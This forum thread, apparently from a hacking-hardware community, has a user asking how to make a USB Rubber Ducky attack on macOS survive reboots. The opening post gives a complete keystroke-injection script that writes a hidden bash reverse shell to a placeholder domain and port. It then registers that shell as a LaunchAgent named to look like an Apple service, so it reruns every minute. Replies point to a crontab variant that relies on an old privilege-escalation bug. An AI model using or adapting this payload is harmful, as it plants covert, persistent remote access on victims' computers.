Jump to content

Recommended Posts

Posted (edited)

Greetings,

I'm looking for a payload for rubber ducky to execute on mac os and give persistance connection even after a restart of target. I've found below script that only can intiate reverse connection once. Can any one help me out to make it persistance to run reverse connection paylopad after each reboot or when machine come back on line after shutdown.

Here is the script made by Patrick

REM Patrick Mosca
REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir ~/Library/LaunchAgents
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
GUI q
Edited by Net_Spy
Posted (edited)

Hi.

I think that's what you're looking for: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/

This payload uses crontab, but it works just as good !

The only problem is that it relies on a privilege escalation vulnerability in OSX Yosemite, which has been patched in OS X 10.10.5, and as far as I'm aware, it's only been tested on Yosemite.

I hope this solves your issue !

V3sth4cks153

Edited by V3sth4cks153
  • 1 month later...
Posted

@V3sth4cks153 Do I need to make usb firmware as twin compose for that or not??

Regards

Net_Spy

Hi,

No, you don't need to: the script will work on the stock firmware, as it is fully self contained.

Regards,

V3sth4cks153

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...